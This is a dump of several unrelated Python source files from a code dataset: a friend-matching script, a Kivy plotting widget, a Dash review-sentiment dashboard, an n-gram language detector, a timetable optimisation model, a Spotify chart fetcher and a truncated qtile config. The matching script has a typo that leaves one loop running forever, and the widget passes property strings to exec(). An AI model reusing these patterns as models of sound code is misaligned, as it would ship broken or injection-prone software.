1\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\ndf_over_18 = df[df['Age'] > 18]\n\n#Over 18 Male and Female filter\ndf_M_over_18 = df_over_18[df_over_18['Gender'] == 'Male']\ndf_F_over_18 = df_over_18[df_over_18['Gender'] == 'Female']\n\n\n'''------------------------------Same Gender over 18-----------------------------'''\n\n#over 18 Males that prefer Males\ndf_M_over_18_PM = df_M_over_18[df_M_over_18['PG'] == 'Male']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_M_over_PM = {}\nk = 0\n\nwhile len(df_M_over_18_PM) > 1:\n df_M_over_18_PM.reset_index(drop=True, inplace=True)\n dic_M_over_PM[\"Match_M_over_PM{0}\".format(k)] = df_M_over_18_PM.iloc[:2]\n\n df_M_over_18_PM.reset_index(drop=True, inplace=True)\n df_M_over_18_PM = df_M_over_18_PM.drop([df_M_over_18_PM.index[0], df_M_over_18_PM.index[1]])\n\n k += 1\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n#over 18 females that Prefer Females\ndf_F_over_18_PF = df_F_over_18[df_F_over_18['PG'] == 'Female']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_F_over_PF = {}\nk = 0\nwhile len(df_F_over_18_PF) > 1:\n\n df_F_over_18_PF.reset_index(drop=True, inplace=True)\n dic_F_over_PF[\"Match_F_over_PF{0}\".format(k)] = df_F_over_18_PF.iloc[:2]\n\n df_F_over_18_PF.reset_index(drop=True, inplace=True)\n df_Fover_188_PF = df_F_over_18_PF.drop([df_F_over_18_PF.index[0], df_F_over_18_PF.index[1]])\n\n k += 1\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n'''------------------------------Opposite Gender over 18-----------------------------'''\n\n#over 18 Males that prefer Females\ndf_M_over_18_PF = df_M_over_18[df_M_over_18['PG'] == 'Female']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n#over 18 Females that prefer Males\ndf_F_over_18_PM = df_F_over_18[df_F_over_18['PG'] == 'Male']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_F_over_PM = {}\nk = 0\nwhile len(df_M_over_18_PF) > 1 and len(df_F_over_18_PM) > 1:\n df_M_over_18_PF.reset_index(drop=True, inplace=True)\n df_F_over_18_PM.reset_index(drop=True, inplace=True)\n\n dic_F_over_PM[\"Match_MF_over_PFM{0}\".format(k)] = [df_M_over_18_PF.iloc[:1], df_F_over_18_PM.iloc[:1]]\n\n df_M_over_18_PF.reset_index(drop=True, inplace=True)\n df_F_over_18_PM.reset_index(drop=True, inplace=True)\n\n df_M_over_18_PF = df_M_over_18_PF.drop([df_M_over_18_PF.index[0]])\n df_F_over_18_PM = df_F_over_18_PM.drop([df_F_over_18_PM.index[0]])\n\n k += 1\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n'''-----------------------------------Either over 18-------------------------------------------'''\n\n\ndf_E_over_18_PE = df_over_18[df_over_18['PG'] == 'Either']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_E_over_PE = {}\nk = 0\n\nwhile len(df_E_over_18_PE) > 1:\n\n df_E_over_18_PE.reset_index(drop=True, inplace=True)\n dic_E_over_PE[\"Match_E_over_PE{0}\".format(k)] = df_E_over_18_PE.iloc[:2]\n\n df_E_over_18_PE.reset_index(drop=True, inplace=True)\n df_E_over_18_PE = df_E_over_18_PE.drop([df_E_over_18_PE.index[0], df_E_over_18_PE.index[1]])\n\n k += 1\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nprint(dic_M_under_PM)\nprint(dic_F_under_PF)\nprint(dic_MF_under_PFM)\nprint(dic_E_under_PE)\n\n\nprint(dic_M_over_PM)\nprint(dic_F_over_PF)\n#print(dic_MF_over_PFM)\nprint(dic_E_over_PE)\n\n\n","repo_name":"Zerkue/Friends-Matching","sub_path":"tiktokmatch.py","file_name":"tiktokmatch.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41829285367","text":"import numpy as np\nfrom kivy.uix.togglebutton import ToggleButton\nfrom kivy.uix.button import Button\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.stacklayout import StackLayout\nfrom kivy.properties import ObjectProperty, StringProperty, NumericProperty, OptionProperty, BooleanProperty\nfrom kivy.core.window import Window\nfrom kivy.graphics.transformation import Matrix\nfrom functools import partial\nimport os\nfrom kivy.graphics.context_instructions import *\nfrom kivy.graphics import RenderContext\nfrom kivy.clock import Clock\n\nimport rvit.core\nfrom ..configurable_property import ConfigurableProperty\n\n\nclass RvitWidget(FloatLayout):\n unique_name = StringProperty('')\n target_object = ObjectProperty(None)\n target_varname = StringProperty('')\n show_controls = BooleanProperty(True)\n auto_update = BooleanProperty(True)\n update_interval = NumericProperty(1.0 / 60.0)\n xmin = NumericProperty(-1.)\n xmax = NumericProperty(1.)\n ymin = NumericProperty(-1.)\n ymax = NumericProperty(1.)\n preprocess = StringProperty('')\n secondary_preprocess = StringProperty('')\n\n def __init__(self, *args, **kwargs):\n self.render_context = RenderContext()\n super(RvitWidget, self).__init__(**kwargs)\n self.top_buttons = BoxLayout(orientation='horizontal',\n size_hint=(1.0, None),\n size=(0, 20),\n pos_hint={'right': 1.0,\n 'top': 1.0},)\n self.title_label = Label()\n self.top_buttons.add_widget(self.title_label)\n\n self.configurable_properties = {}\n\n if 'inspect' in dir(self):\n self.inspect_button = Button(text='inspect',\n on_press=lambda x: self.inspect(),\n background_color=rvit.core.WHITE,\n pos_hint={'x': 0.0, 'top': 1.0})\n\n self.top_buttons.add_widget(self.inspect_button)\n\n self.disable_button = ToggleButton(size_hint=(None, None),\n background_color=rvit.core.RED,\n size=(20, 20),\n state='down',\n )\n\n def enabled_state_changed(inst, value):\n self.enabled = value == 'down'\n self.enabled = True\n self.disable_button.bind(state=enabled_state_changed)\n self.top_buttons.add_widget(self.disable_button)\n\n self.add_widget(self.top_buttons)\n\n self.render_context['modelview_mat'] = Matrix().identity()\n self.render_context['projection_mat'] = Matrix().identity()\n self.render_context['window_size'] = [float(Window.width), float(Window.height)]\n self.canvas.before.add(self.render_context)\n\n self.update_event = None\n # self.update_interval.dispatch()\n # self.on_show_controls\n\n prop = self.property('update_interval')\n # dispatch this property on the button instance\n prop.dispatch(self)\n\n def addConfigurableProperty(self, prop):\n self.configurable_properties[prop.name] = ConfigurableProperty(prop, self)\n\n def removeConfigurableProperty(self, prop):\n self.configurable_properties.pop(prop.name)\n\n def registerConfigurableProperties(self):\n self.addConfigurableProperty(RvitWidget.xmin)\n self.addConfigurableProperty(RvitWidget.xmax)\n self.addConfigurableProperty(RvitWidget.ymin)\n self.addConfigurableProperty(RvitWidget.ymax)\n\n def on_unique_name(self, obj, unique_name):\n \"\"\"Once the widget is given a non-empty unique name, set up its\n configuration panel UI.\n\n \"\"\"\n\n if unique_name != '':\n self.title_label.text = unique_name\n self.registerConfigurableProperties()\n if len(self.configurable_properties) > 0:\n def test(value):\n content = StackLayout()\n for k in self.configurable_properties.keys():\n content.add_widget(\n self.configurable_properties[k].getConfigurationSubpanel())\n popup = Popup(title='Configure', content=content)\n popup.open()\n\n self.configure_button = Button(text='configure',\n on_press=test,\n background_color=rvit.core.BLUE,\n pos_hint={'x': 0.0, 'top': 1.0})\n\n self.top_buttons.add_widget(self.configure_button, index=2)\n\n def updateProjectionMatrices(self):\n \"\"\" makes 0,0 the lower left corner and 1,1 the upper right \"\"\"\n w = float(Window.width)\n h = float(Window.height)\n m = Matrix().identity()\n p = rvit.core.BUTTON_BORDER_HEIGHT\n # self.projection_r = min(self.size[0],self.size[1]-p)\n # m.scale(self.projection_r/w*2,\n # self.projection_r/h*2,1.0)\n m.scale(2.0 * self.width / w,\n 2.0 * (self.height - p) / h, 1.0)\n m.translate(-1.0 + (self.pos[0]) * 2.0 / w,\n -1.0 + (self.pos[1]) * 2.0 / h,\n 0.0)\n self.render_context['projection_mat'] = m\n\n def updateModelViewMatrix(self):\n m = Matrix().identity()\n hr = max(0.00001, (self.xmax - self.xmin))\n vr = max(0.00001, (self.ymax - self.ymin))\n m.scale(1.0 / hr,\n 1.0 / vr,\n 1.0)\n m.translate(-self.xmin / hr,\n -self.ymin / vr,\n 0.0)\n self.render_context['modelview_mat'] = m\n\n def on_size(self, inst, value):\n self.updateProjectionMatrices()\n\n def on_pos(self, inst, value):\n self.updateProjectionMatrices()\n\n def on_show_controls(self, inst, value):\n if value == True:\n self.add_widget(self.top_buttons)\n else:\n if self.top_buttons in self.children:\n self.remove_widget(self.top_buttons)\n\n def createInspectionDumpFile(self):\n try:\n os.makedirs(skivy.inspection_path)\n except os.error:\n pass\n\n datafile_name = filter(str.isalnum, self.unique_name)\n return os.path.join(skivy.inspection_path, datafile_name)\n\n def launchInspector(self, datafile_name):\n from subprocess import call\n\n inspection_script_name = 'inspect_%s.py' % (filter(str.isalnum, self.unique_name))\n inspection_script_path = os.path.join(skivy.inspection_path, inspection_script_name)\n with open(inspection_script_path, \"w\") as text_file:\n text_file.write('from pylab import *\\n')\n text_file.write('a = np.load(\"%s\")\\n' % (datafile_name))\n text_file.write(\"print('%s is loaded in the variable called `a`')\\n\" % (datafile_name))\n\n instructions = ['gnome-terminal', '-e',\n \"\"\" bash -c \"cd \"\"\" + skivy.inspection_path +\n \"\"\" ; ipython -i \"\"\" + inspection_script_name + \"\"\" \" \"\"\"]\n call(instructions)\n\n def on_target_object(self, inst, value):\n self.target_object = value\n self.setTarget()\n\n def on_target_varname(self, inst, value):\n self.target_varname = value\n self.setTarget()\n\n def on_xmin(self, obj, value):\n self.updateModelViewMatrix()\n\n def on_xmax(self, obj, value):\n self.updateModelViewMatrix()\n\n def on_ymin(self, obj, value):\n self.updateModelViewMatrix()\n\n def on_ymax(self, obj, value):\n self.updateModelViewMatrix()\n\n def on_preprocess(self, obj, value):\n self.preprocess = value\n s = 'self.preprocess_fn = %s' % (self.preprocess)\n exec(s)\n\n def on_secondary_preprocess(self, obj, value):\n self.secondary_preprocess = value\n s = 'self.secondary_preprocess_fn = %s' % (self.secondary_preprocess)\n exec(s)\n\n def apply_preprocessing(self, data):\n if self.preprocess != '':\n return self.preprocess_fn(data)\n else:\n return data\n\n def apply_secondary_preprocessing(self, data):\n if self.secondary_preprocess != '':\n return self.secondary_preprocess_fn(data)\n else:\n return data\n\n def on_update_interval(self, obj, value):\n if self.update_event is not None:\n self.update_event.cancel()\n\n if self.auto_update:\n def iterate(a):\n self.update()\n self.update_event = Clock.schedule_interval(iterate, self.update_interval)\n\n\nclass ScaledValues(RvitWidget):\n # minimum_value = OptionProperty('auto',options=['0','-1','-pi','auto'])\n # maximum_value = OptionProperty('auto',options=['0','1','pi','auto'])\n minimum_value = StringProperty('auto') # ,options=['0','-1','-pi','auto'])\n maximum_value = StringProperty('auto') # ,options=['0','1','pi','auto'])\n\n def __init__(self, *args, **kwargs):\n super(ScaledValues, self).__init__(**kwargs)\n\n self.cur_max_label = Label(text='max',\n size_hint=(None, None),\n size=(100, 20),\n pos_hint={'right': 1.0,\n 'top': 0.95},)\n self.cur_min_label = Label(text='min',\n size_hint=(None, None),\n size=(100, 20),\n pos_hint={'right': 1.0,\n 'y': 0.0},)\n self.cur_min_label.text_size = self.cur_min_label.size\n self.cur_max_label.text_size = self.cur_max_label.size\n\n self.add_widget(self.cur_min_label) # hohee\n self.add_widget(self.cur_max_label) # hohee\n\n def registerConfigurableProperties(self):\n cp = super(ScaledValues, self).registerConfigurableProperties()\n self.addConfigurableProperty(ScaledValues.minimum_value)\n self.addConfigurableProperty(ScaledValues.maximum_value)\n\n\nclass SecondaryDataSource(RvitWidget):\n secondary_varname = StringProperty('')\n\n def __init__(self, *args, **kwargs):\n super(SecondaryDataSource, self).__init__(**kwargs)\n\n def on_secondary_varname(self, obj, value):\n self.secondary_varname = value\n if self.target_object is not None and self.secondary_varname != '':\n s = 'self.b = self.target_object.%s' % (self.secondary_varname)\n exec(s)\n\n\n# ### Local Variables: ###\n# ### mode: python ###\n# ### python-main-file: \"main.py\" ###\n# ### python-working-dir: \"../minimal_project/\" ###\n# ### End: ###\n","repo_name":"matthew-egbert/rvit","sub_path":"rvit/core/widgets/rvit_widget.py","file_name":"rvit_widget.py","file_ext":"py","file_size_in_byte":10917,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"34279660488","text":"import pandas as pd\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n# Sampled dataframe 'sampled_df' containing the required columns\n# Replace this with your actual dataframe\n# sampled_df = pd.read_csv('path_to_sampled_df.csv') # Load your data here\n\nsampled_df = pd.read_csv(r'https://raw.githubusercontent.com/ZaidAlmelhem/Dashboards/main/Distribution%20of%20Review%20Scores%20for%20Mobile%20Apps/sampled_df_8_7.csv')\n\n# Create a Dash app\napp = dash.Dash(__name__)\nserver = app.server\n\n# Layout of the app\napp.layout = html.Div([\n html.H1(\"Sentiment Analysis Dashboard\"),\n \n # Dropdown to select the name of the app\n html.Label(\"Select the Name of the App:\"),\n dcc.Dropdown(\n id='app-name-dropdown',\n options=[{'label': app_name, 'value': app_name} for app_name in sampled_df['app_name'].unique()],\n value=sampled_df['app_name'].unique()[0],\n ),\n \n # Slider to filter the score\n html.Label(\"Select Score Filter:\"),\n dcc.Slider(\n id='score-filter-slider',\n min=1,\n max=5,\n value=3,\n marks={i: str(i) for i in range(1, 6)},\n step=1\n ),\n \n # Placeholder for displaying the reviews and sentiment analysis\n html.Div(id='review-sentiment-container'),\n])\n\n# Callback to update the review and sentiment analysis display\n@app.callback(\n Output('review-sentiment-container', 'children'),\n Input('app-name-dropdown', 'value'),\n Input('score-filter-slider', 'value')\n)\ndef update_review_sentiment(app_name, score_filter):\n filtered_reviews = sampled_df[(sampled_df['app_name'] == app_name) & (sampled_df['score'] == score_filter)]\n \n review_sentiment_html = []\n for _, row in filtered_reviews.iterrows():\n review_sentiment_html.append(html.Div([\n html.H3(f\"Review {row.name}\"),\n html.P(f\"Review Text: {row['review']}\"),\n html.P(f\"Processed Text: {row['processed_text']}\"),\n html.P(f\"Score: {row['score']}\"),\n html.P(f\"TextBlob Sentiment Score: {row['textblob_sentiment_score']}\"),\n html.P(f\"Bert Sentiment Score: {row['bert_sentiment_score']}\"),\n html.P(f\"Segmented Bert Sentiment Score: {row['segmented_bert_sentiment_score']}\"),\n html.Hr(),\n ]))\n \n return review_sentiment_html\n\n# Run the app\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"ZaidAlmelhem/Dashboards","sub_path":"Distribution of Review Scores for Mobile Apps/dashboard_4.py","file_name":"dashboard_4.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38652139823","text":"import math\nfrom collections import Counter\n\n\ndef prepare(text):\n \"\"\"\n Returns a list of words in a string.\n Certain characters are replaced by whitespace, and the text is split based on whitespaces.\n @param: text: string (The text of which to return a wordlist)\n \"\"\"\n badCharacters = [\"!\", \"?\", \",\", \".\", \"\\\"\", \"(\", \")\", \"<\", \">\"]\n splitText = [char for char in text]\n for i in range(len(splitText)):\n if splitText[i] in badCharacters:\n splitText[i] = \" \"\n wordString = ''.join(splitText)\n wordList = wordString.split()\n return wordList\n\n\ndef ngrams(seq, n=3):\n \"\"\"\n Returns a list of n-grams in a string.\n @param: seq: string (The string for which n-grams must be returned)\n @param: n: int, default: 3 (Type of n-grams to return)\n \"\"\"\n #! Dit moet makkelijker kunnen\n ngramList = []\n for i in range(len(seq) - (n-1)):\n ngram = \"\"\n for j in range(n):\n ngram += seq[i + j]\n ngramList.append(ngram)\n return ngramList\n\n\ndef ngram_table(text, n=3, limit=0):\n \"\"\"\n Returns a table of a text's n-grams and their counts, sorted by their counts.\n @param: text: string (The text for which to make an n-gram table)\n @param: n: int (The type of n-gram)\n @param: limit: int (The maximum amount of n-grams in the returned table)\n \"\"\"\n Tlist = prepare(text)\n foundNgrams = {}\n for element in Tlist:\n element = ('<' + element + '>')\n ngramList = ngrams(element, n)\n for ngram in ngramList:\n if ngram in foundNgrams:\n foundNgrams[ngram] += 1\n else:\n foundNgrams[ngram] = 1\n sortedNgrams = {}\n teller = 0\n for k, v in sorted(foundNgrams.items(), reverse=True, key=lambda x: x[1]):\n if teller < limit or limit == 0:\n sortedNgrams[k] = v\n teller += 1\n return sortedNgrams\n\n\ndef write_ngrams(table, filename):\n \"\"\"\n Writes the contents of an n-gram table to a file.\n @param: table: dict (The n-gram table to write to a file)\n @param: filename: string (The name of the file to write to)\n \"\"\"\n with open(filename, \"w\", encoding=\"utf8\") as conn:\n for line in table:\n conn.write(str(table[line]))\n conn.write(\" \")\n conn.write(str(line))\n conn.write(\"\\n\")\n\n\ndef read_ngrams(filename):\n \"\"\"\n Reads a file and returns an n-gram table with the n-grams and counts in the file.\n @param: filename: string (The name of the file from which to read)\n \"\"\"\n with open(filename, encoding=\"utf8\") as conn:\n alltext = conn.read()\n splitText = alltext.splitlines()\n table = {}\n for line in splitText:\n splitLine = line.split()\n table[splitLine[1]] = int(splitLine[0])\n return table\n\n\ndef cosine_similarity(table1, table2):\n \"\"\"\n Calculates and returns the cosine similarity between two tables of n-grams\n @param: table1: dict (The first table to compare)\n @param: table2: dict (The second table to compare)\n \"\"\"\n a = Counter(table1)\n b = Counter(table2)\n termen = set(a).union(b)\n product = sum(a.get(k, 0) * b.get(k, 0) for k in termen)\n berekeningA = math.sqrt(sum(a.get(k, 0)**2 for k in termen))\n berekeningB = math.sqrt(sum(b.get(k, 0)**2 for k in termen))\n return product / (berekeningA * berekeningB)\n","repo_name":"tsjabie-o/Language-detector","sub_path":"langdetect.py","file_name":"langdetect.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44309371218","text":"import logging\nfrom typing import Dict, Union\n\nfrom core.exceptions.algorithm_dijkstra import AlgorithmStoppingCriterionException\nfrom core.solver.generic_solver_interface import IntAttribute, Model, Variable, VariableType, LinearExpression, \\\n OptimizationSense, ConstraintSense, Status, DoubleAttribute\nfrom ean_data import EanEvent, EanActivity, Ean, AperiodicEan\nfrom lin_veh_to_tim_helper import LinVehToTimParameters\nfrom line_data import LinePool, Line\nfrom vehicle_schedule import VehicleSchedule\nfrom vs_helper import TurnaroundData\nfrom write_csv import write_periodic_timetable, write_aperiodic_ean, write_solver_statistic, write_vehicle_schedule\n\nlogger = logging.getLogger(__name__)\n\n\nclass LinVehToTimGenericModel:\n\n def __init__(self, parameters: LinVehToTimParameters, ean: Ean, line_pool: LinePool,\n vehicle_schedule: VehicleSchedule, turn_around_data: TurnaroundData) -> None:\n # Given data\n self._parameters = parameters\n self._line_pool = line_pool\n self._ean = ean\n self._turn_around_data = turn_around_data\n self._vehicle_schedule = vehicle_schedule\n\n # Instance data\n\n # Model data\n self._m = None # type: Union[None, Model]\n self.is_feasible = False\n self._pi = {} # type: Dict[EanEvent, Variable]\n self._modulo_parameter = {} # type: Dict[EanActivity, Variable]\n self._duration = {} # type: Dict[Line, Variable]\n self._start = {} # type: Dict[Line, Dict[int, Variable]]\n self._end = {} # type: Dict[Line, Dict[int, Variable]]\n\n def create_model(self) -> None:\n self._m = self._parameters.initialize_generic_model()\n self._create_variables()\n self._initialize_objective_function()\n self._create_constraints()\n if self._parameters.write_lp_output:\n self._write_lp_output()\n\n def _create_variables(self) -> None:\n logger.debug(\"Initialize variables\")\n self._add_timetabling_variables()\n self._add_duration_variables()\n self._add_start_variables()\n self._add_end_variables()\n logger.debug(f\"Number of variables: {self._m.getIntAttribute(IntAttribute.NUM_VARIABLES)}\")\n\n def _add_timetabling_variables(self):\n for event in self._ean.get_events_network():\n self._pi[event] = self._m.addVariable(0, self._parameters.period_length - 1, VariableType.INTEGER,\n name=f'pi_{event.get_event_id()}')\n if self._parameters.set_starting_timetable:\n self._m.setStartValue(self._pi[event], event.get_event_time())\n for activity in self._ean.get_all_activities():\n self._modulo_parameter[activity] = self._m.addVariable(var_type=VariableType.INTEGER,\n name=f'z_{activity.get_activity_id()}')\n\n def _add_duration_variables(self):\n for line in self._line_pool.get_lines():\n self._duration[line] = self._m.addVariable(var_type=VariableType.INTEGER,\n name=f'duration_{line}')\n\n def _add_start_variables(self):\n for line in self._line_pool.get_lines():\n self._start[line] = {}\n for p in range(1, self._vehicle_schedule.get_drivings(line) + 1):\n self._start[line][p] = self._m.addVariable(var_type=VariableType.INTEGER,\n name=f'start({p},{line})')\n\n def _add_end_variables(self):\n for line in self._line_pool.get_lines():\n self._end[line] = {}\n for p in range(1, self._vehicle_schedule.get_drivings(line) + 1):\n self._end[line][p] = self._m.addVariable(var_type=VariableType.INTEGER,\n name=f'end({p},{line})')\n\n def _initialize_objective_function(self) -> None:\n logger.debug(\"Initialize objective function\")\n sum_travel_time = self._m.createExpression()\n sum_drive_time = self._m.createExpression()\n sum_wait_time = self._m.createExpression()\n sum_transfer_time = self._m.createExpression()\n\n for activity in self._ean.get_activities(['drive', 'wait', 'trans']):\n sum_travel_time.multiAdd(activity.get_n_passengers(), self._get_duration(activity))\n if activity.get_activity_type() == 'drive':\n sum_drive_time.multiAdd(activity.get_n_passengers(), self._get_duration(activity))\n elif activity.get_activity_type() == 'wait':\n sum_wait_time.multiAdd(activity.get_n_passengers(), self._get_duration(activity))\n elif activity.get_activity_type() == 'trans':\n sum_transfer_time.multiAdd(activity.get_n_passengers(), self._get_duration(activity))\n\n objective = self._m.createExpression()\n objective.multiAdd(self._parameters.factor_travel_time, sum_travel_time)\n objective.multiAdd(self._parameters.factor_drive_time, sum_drive_time)\n objective.multiAdd(self._parameters.factor_wait_time, sum_wait_time)\n objective.multiAdd(self._parameters.factor_transfer_time, sum_transfer_time)\n self._m.setObjective(objective, OptimizationSense.MINIMIZE)\n\n def _get_duration(self, activity: EanActivity) -> LinearExpression:\n duration = self._m.createExpression()\n duration.addTerm(1, self._pi[activity.get_right_event()])\n duration.addTerm(-1, self._pi[activity.get_left_event()])\n duration.addTerm(self._parameters.period_length, self._modulo_parameter[activity])\n return duration\n\n def _create_constraints(self):\n logger.debug(\"Add constraints:\")\n self._add_timetabling_constraints()\n self._add_duration_constraints()\n self._add_start_and_end_constraints()\n self._add_time_difference_constraints()\n\n def _add_timetabling_constraints(self):\n logger.debug(\"\\ttimetabling\")\n for activity in self._ean.get_all_activities():\n duration = self._get_duration(activity)\n self._m.addConstraint(duration, ConstraintSense.GREATER_EQUAL, activity.get_lower_bound(),\n f\"l_{activity.get_activity_id()}\")\n self._m.addConstraint(duration, ConstraintSense.LESS_EQUAL, activity.get_upper_bound(),\n f\"u_{activity.get_activity_id()}\")\n\n def _add_duration_constraints(self):\n logger.debug(\"\\tduration of a line\")\n duration_expression = self._m.createExpression()\n for line in self._line_pool.get_lines():\n duration_expression.clear()\n for activity in self._ean.get_activities_in_line(line):\n duration_expression.add(self._get_duration(activity))\n duration_expression.addTerm(-1, self._duration[line])\n self._m.addConstraint(duration_expression, ConstraintSense.EQUAL, 0,\n f\"duration_{line}\")\n\n def _add_start_and_end_constraints(self):\n logger.debug(\"\\tstart and end\")\n lhs = self._m.createExpression()\n for line in self._line_pool.get_lines():\n for p in range(1, self._vehicle_schedule.get_drivings(line) + 1):\n lhs.clear()\n lhs.addTerm(1, self._start[line][p])\n lhs.addTerm(-1, self._pi[self._ean.get_first_event_in_line(line)])\n self._m.addConstraint(lhs, ConstraintSense.EQUAL, (p - 1) * self._parameters.period_length,\n f\"start({p},{line})\")\n lhs.clear()\n lhs.addTerm(1, self._end[line][p])\n lhs.addTerm(-1, self._pi[self._ean.get_first_event_in_line(line)])\n lhs.addTerm(-1, self._duration[line])\n self._m.addConstraint(lhs, ConstraintSense.EQUAL, (p - 1) * self._parameters.period_length,\n f\"end({p},{line})\")\n\n def _add_time_difference_constraints(self):\n logger.debug(\"\\tminimum time difference\")\n lhs = self._m.createExpression()\n for connection in self._vehicle_schedule.get_connections():\n p_1 = connection.get_period_1()\n l_1 = connection.get_line_1()\n p_2 = connection.get_period_2()\n l_2 = connection.get_line_2()\n lhs.clear()\n lhs.addTerm(1, self._start[l_2][p_2])\n lhs.addTerm(-1, self._end[l_1][p_1])\n self._m.addConstraint(lhs, ConstraintSense.GREATER_EQUAL,\n self._turn_around_data.get_min_turnaround_time(l_1.get_last_stop(),\n l_2.get_first_stop()),\n f\"L({l_1},{p_1},{l_2},{p_2})\")\n\n def _write_lp_output(self):\n self._m.write(\"LinVehToTim.lp\")\n\n def solve(self):\n logger.debug(\"Start optimization\")\n self._m.solve()\n self.is_feasible = self._m.getIntAttribute(IntAttribute.NUM_SOLUTIONS) > 0\n if not self.is_feasible:\n logger.debug(\"No feasible solution found\")\n if self._m.getStatus() == Status.INFEASIBLE:\n self._m.computeIIS(\"LinVehToTim.ilp\")\n raise AlgorithmStoppingCriterionException(\"Lin Veh To Tim\")\n if self._m.getStatus() == Status.OPTIMAL:\n logger.debug(\"Optimal solution found\")\n else:\n logger.debug(\"Feasible solution found\")\n logger.debug(f\"Objective: {self._m.getDoubleAttribute(DoubleAttribute.OBJ_VAL)}\")\n logger.debug(\"End optimization\")\n\n def write_output(self):\n logger.debug(\"Start constructing output\")\n pi_solution = {event: int(round(self._m.getValue(self._pi[event]))) for event in self._pi.keys()}\n duration_solution = {line: int(round(self._m.getValue(var))) for line, var in self._duration.items()}\n write_solver_statistic(self._parameters, self._m.getIntAttribute(IntAttribute.RUNTIME),\n self._m.getDoubleAttribute(DoubleAttribute.MIP_GAP),\n self._m.getDoubleAttribute(DoubleAttribute.OBJ_VAL))\n write_periodic_timetable(self._parameters, self._ean, pi_solution)\n for vehicle in self._vehicle_schedule.get_vehicles():\n vehicle.find_all_connections(self._vehicle_schedule.get_connections())\n logger.debug(\"Construct aperiodic ean:\")\n aperiodic_ean = AperiodicEan(self._ean)\n aperiodic_ean.aperiodic_ean_from_vehicle_schedule(self._ean, self._vehicle_schedule, duration_solution,\n pi_solution, self._parameters.period_length)\n aperiodic_ean.update_aperiodic_times(self._parameters.ean_earliest_time)\n write_aperiodic_ean(self._parameters, self._ean, aperiodic_ean)\n write_vehicle_schedule(self._parameters, self._ean, aperiodic_ean, self._vehicle_schedule, duration_solution,\n self._parameters.period_length)\n","repo_name":"kaat0/OpenLinTim","sub_path":"src/integrated_models/eigenmodel/lin_veh_to_tim/lin_veh_to_tim_generic.py","file_name":"lin_veh_to_tim_generic.py","file_ext":"py","file_size_in_byte":11073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3144387378","text":"import requests\n\nglobal_charts = 'https://spotifycharts.com/regional/global/daily/latest/download'\nglobal_page = requests.get(global_charts)\nprint(global_page.content)\n\nsongs = 'regional'\narea = 'global'\ntime = 'daily'\nperiod = 'latest'\n\nchart = 'https://spotifycharts.com/%s/%s/%s/%s/download' % (\n songs, area, time, period)\npage = requests.get(chart)\nprint(page.content)\n","repo_name":"Ahmadjawaid/verbose-bassoon","sub_path":"spotify_charts.py","file_name":"spotify_charts.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24396815762","text":"import os\nimport subprocess\nfrom libqtile import hook\nfrom libqtile import bar, layout, widget\nfrom libqtile.config import Click, Drag, Group, Key, Match, Screen\nfrom libqtile.lazy import lazy\nfrom libqtile.utils import guess_terminal\nfrom colors import gruvbox\n\nmod = \"mod4\"\nmod1 = \"mod1\"\nterminal = \"terminator\"\n\n\nkeys = [\n ### The essentials\n Key([mod], \"Return\",\n lazy.spawn(terminal),\n desc='Launches My Terminal'\n ),\n Key([mod1, \"shift\"], \"c\",\n lazy.spawn(\"google-chrome-stable\"),\n desc='Launches My Chrome'\n ),\n Key([mod, \"shift\"], \"Return\",\n lazy.spawn(\"/home/abhi/.config/rofi/launchers/type-2/launcher.sh\"),\n desc='Run Launcher'\n ),\n Key([mod, \"shift\"], \"x\",\n lazy.spawn(\"/home/abhi/.config/rofi/powermenu/type-2/powermenu.sh\"),\n desc='Run Launcher'\n ),\n Key([mod1], \"f\",\n lazy.spawn(\"firefox\"),\n desc='Firefox'\n ),\n Key([mod1], \"d\",\n lazy.spawn(\"discord\"),\n desc='Discord'\n ),\n Key([mod1], \"t\",\n lazy.spawn(\"telegram-desktop\"),\n desc='Telegram'\n ),\n Key([mod1], \"c\",\n lazy.spawn(\"code\"),\n desc='VS Code'\n ),\n Key([mod1], \"n\",\n 